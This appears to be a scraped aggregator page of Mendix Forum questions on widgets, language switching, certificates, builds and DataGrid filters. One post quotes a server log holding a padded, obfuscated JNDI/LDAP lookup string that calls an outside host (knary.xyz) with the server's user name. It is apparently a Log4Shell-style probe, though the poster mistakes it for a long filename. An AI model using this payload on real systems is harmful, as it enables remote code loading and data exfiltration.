Quantcast
Channel: Mendix Forum Questions
Viewing all 83469 articles
Browse latest View live

Video Player for Mendix 9.11

$
0
0
Hello, Someone here with Experience with the Video Player widget? is there something else to do except pasting the Url in the video Url field ? Did it like this but the Video is failed to load. Must to say that im trying it Local, maybe the Reason ? Thanks for you Advive Best Regard

Microflow expression for a failed parseDecimal function

$
0
0
Hello - I have a microflow that converts a string to a decimal (parseDecimal) and stores that new value in a separate decimal attribute. I'm doing this using a $variable, and I would like to return a message if the $variable doesn't contain something that can convert - so "1.5" would convert, but "text" would not, for example. Anyone know how to write this expression in Mendix? Thanks, Mark

Changing User Language - mx.reloadWithState() not working (properly)

$
0
0
Hi Everyone, I am trying to let the user have the option to change the user language via a dropdown on a page. I followed the instructions in the Mendix Ref Guide: https://docs.mendix.com/refguide/translatable-texts/ So I used the mx.reloadWithState JavaScript Snippet on a Pop-Up page and calling/showing that page in the microflow in which I am changing the language. It seems to do what it’s supposed to do and refreshes the page but the language doesn’t change. For some reason it takes a while (sth. like 10-20 seconds) and if I refresh then the language changes. I can see that the user language gets changed correctly for the account and also the rest of the logic seems to work fine, except the translated texts are not showing. If I use the debugger and go through the microflow step by step it’s working perfectly. It almost feels like the browser / cache needs some time to get the translation ;) I tried a couple of things yesterday (different browsers, nanoflow instead of microflow, playing around with the refresh in client, having a delay before calling the “reload” pop-up and so on) and now I’m out of ideas and really clueless what’s the cause for this. I’d appreciate any help/idea how to fix this. Thanks in advance! Also I will put a more detailed description of the setup below. Cheers Jan More detailed description of the setup: Since it was requested to show language options in their respective language I created a “LanguageSelector” Entity associated with the User Account (1-1) with an enumeration attribute containing those different language options. Since I’m using the account object on a data view on that page I simply put a dropdown for the language selection on the respective page and added a on-change event with the microflow for changing the language → retrieving the System.Language depending on the selection → changing the account / user language to that language → committing the changes → calling the pop-up with mx.reloadWithState JavaScript snippet

Charts Demo App

$
0
0
Dear all, I would like to ask if I can get this application https://charts102-sandbox.mxapps.io/p/home ? This application is very practical and contains all graphical use cases. I am appreciate if anyone can give the mpr file to me. Best Regards! Long

Restrict access to predefined set of client certificates (Mendix Cloud)

$
0
0
Is it possible to limit access to 1 or a number of predefined client certificates (app running in Mendix Cloud v4)? Perhaps via custom settings or otherwise? 'Access restriction profiles' only work at the level of root CA or intermediates, so any certificate issued by them would be accepted. ("In addition, you can restrict incoming traffic by requiring client certificates signed by a certificate authority of your choice." - https://docs.mendix.com/developerportal/deploy/certificates) ("It should not contain client certificates." - https://docs.mendix.com/developerportal/deploy/access-restrictions) It is possible to limit to certificates issued by a selected intermediate in an access restriction profile, but this still does not limit it to 1/n predefined certificates. One workaround I found is to use selfsigned certificates to bypass the need for a root issuer. I'm wondering if there are any others :) Thx!

Calypso \theme\styles doesn't exist

$
0
0
Anyone else having trouble using Calypso with Mendix Studio Pro It’s true that this path does not exist, but it does for other projects, and I do not know why it is missing in some others.

Automatic reload - Custom Widget Development

$
0
0
Hi, I used the Mendix Widget Generator to create a custom widget in typescript and added it to my Mendix App. Now everytime I did some changes in my custom app, I need to sync the directory and rebuild the app to see the changes in the browser. Is there any way how to prevent this so that the browser automatically reloads as soon as I save any changes in my custom widget, or can I see the changes of my react app in the browser outside of the mendix app?

Issue with Android Native build failing continuously

$
0
0
I am trying to create an Android build and I keep having certificate issues. I have followed the Mendix instructions for creating the Android certificate but after a day or two it says Keystore password and Key alias is incorrect even though it worked the days beforehand. Unsure if this is the cause for the app build failing or not, has anyone had this issue before making a native mobile app?

Can the System.User entity be changed

$
0
0
So if i want to add some specific attributes to the user or identifiers , I can change the entiry ? Or no

DataGrid 2 - Excel Export Module Blank Data

$
0
0
Hello, I have set up a Microflow on a button above DataGrid2, spreadsheet is blank. I’ll attach Microflow details below. One of the Export Exporter learning path it says to return a list which is ‘CemarList’ but on the Mendix help module it says to return ‘CemarDoc’ so abit stuck with that. Also, the admin has writes in both the MxModel Reflection, XLSReport and full create, read and write access so i’m abit stuck. Thanks for help in advance.

External activities not displaying

$
0
0
Hi experts..Couldn’t find external activities in toolbox for Nanoflow. I am using Mendix pro 9.5.0. Please help.

Native: how to change styles dynamically Based on Language

$
0
0
i want my styling to work based on language selector like in web for example .iconContainerGold{ padding: 11.1px 10.6px 11.1px 11.6px; border-radius: 8px; background-color: #aeb671; border-top-right-radius: 0px; } .iconContainerGold:lang(ar){ margin-left: 10px; } is there a way to do something like this in native ?

Excel Export

$
0
0
com.mendix.modules.microflowengine.MicroflowException: com.mendix.systemwideinterfaces.MendixRuntimeException: java.lang.IllegalArgumentException: sheetName must not be null at MyFirstModule.Process_WinShuttle_Records (JavaAction : 'GenerateExcelDoc')

Make the marker draggable in the Google map

$
0
0
Hello, We need to make the marker draggable in the Google map to point to a location and obtain its latitude and longitude. I’ve tried using the Maps widget but the marker cannot be moved. Kindly help me with a solution how can I achieve this. Thanks.

Custom Access Rules for users

$
0
0
Hi, I am new to Mendix help me to find the solution for the following. I need to have a page in UI where I have to list all the users and pages in columns and rows of a table with checkbox in each cell. If I check the checkbox of first user and first page then first user will have the access for the first page. In simple, I need to have a page like page access(which we have in security of each module or app) in UI with its functionality which is accessible for admin. For Example, Consider two users namely X and Y, and 3 pages namely A, B and C. User X will have access for pages A and B. User Y will have access for page C and Admin will have the access page. Now, Admin have to give access to User Y for page A along with page C. How to achieve this? Thanks in advance.

String split action by multiple parameters

$
0
0
Hello I have a string that I want to split. The Action “String Split” from the mendix community commons package accepts a split parameter. But I want to specify 2 split paramets. How can this be done?

Multi language Mendix application

$
0
0
Hi All, Hope you are doing well !! How can we create a multi-language mendix application where the user can have a drop-down on a login page to select the desired language and then the entire text can be converted to that language. Kindly provide your suggestion or feedback, how we can achieve this. Thanks in advance,

java.io.IOException: File name too long

$
0
0
I have a web app with a FileDocument uploader. Once in a while I get the same user that seems to trigger this error:  ERROR - Connector: com.mendix.systemwideinterfaces.MendixRuntimeException: Failed to canonicalize path '/home/vcap/app/web/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/${j${main:\k5:-Nd}i${spring:k5:-:}ldap:/${sys:user.name}-clarksor.mendixcloud.com.typelongaaaaa.getjs.visualbasic6.com.dns.knary.xyz/}' 2022-03-24T12:20:06.505384 [APP/PROC/WEB/0]      at com.mendix.external.connector.ResourceRequestHandler.getFile(ResourceRequestHandler.java:113) 2022-03-24T12:20:06.505390 [APP/PROC/WEB/0]  Caused by: java.io.IOException: File name too long What… in.. the… world? I find it hard to believe someone is uploading a file with a filename that has the letter “a” repeated 4000 times. I’m pretty sure these are photos being uploaded directly from a smartphone. The odd thing is that the filedocument actually seems to save, but with a generic filename of “image.jpg:”. I can’t imagine any filesystem on any phone that would allow a filename to be saved with 4000 characters. Even if so, is there a way on the client side to truncate the filename *BEFORE* the upload actually happens?

Save filter criteria in DataGrid2

$
0
0
Hello community, I have a problem when saving the filter criteria in DataGrid2. I have already successfully managed to save the general configurations of each user individually. Next I wanted to save the filter criteria of the individual columns also per user and have created additional attributes in the Config Entity and have proceeded analogously as before. Unfortunately the filter criteria are not saved and I wonder what I did wrong. Does anyone of you have the same problem and knows a solution? I am happy about feedback. Regards, Fynn

Connection problems whit version 9.11

$
0
0
Currently I use version 9.10, working normally. But in version 9.11 this error always happens I can't sign in.
Viewing all 83469 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>